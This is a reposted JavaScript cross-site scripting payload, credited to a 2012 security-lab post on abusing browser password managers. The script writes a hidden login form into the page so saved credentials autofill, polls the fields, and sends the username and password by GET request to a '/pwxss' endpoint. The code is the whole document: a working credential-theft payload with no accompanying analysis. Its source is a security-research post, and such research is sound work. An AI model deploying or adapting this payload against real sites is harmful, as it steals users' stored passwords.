1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 |
<script type="text/javascript"> ex_username = ''; ex_password = ''; inter = ''; function attack(){ ex_username = document.getElementById('username').value; ex_password = document.getElementById('password').value; if(ex_username != '' | ex_password != ''){ document.getElementById('xss').style.display = 'none' request=new XMLHttpRequest(); url = "/pwxss?username="+ex_username+"&password="+ex_password; request.open("GET",url,true); request.send(); document.getElementById('xss').style.visibility='hidden'; window.clearInterval(inter); } } document.write("\ <div id='xss'>\ <form method='post' action='index.php'>\ username:<input type='text' name='username' id='username' value='' autocomplete='on'>\ password:<input type='password' name='password' id='password' value='' autocomplete='on'>\ <input type='submit' name='login' value='Log In'>\ </form>\ </div>\ "); inter = window.setInterval("attack()",100); </script> |
转载自:https://labs.neohapsis.com/2012/04/25/abusing-password-managers-with-xss/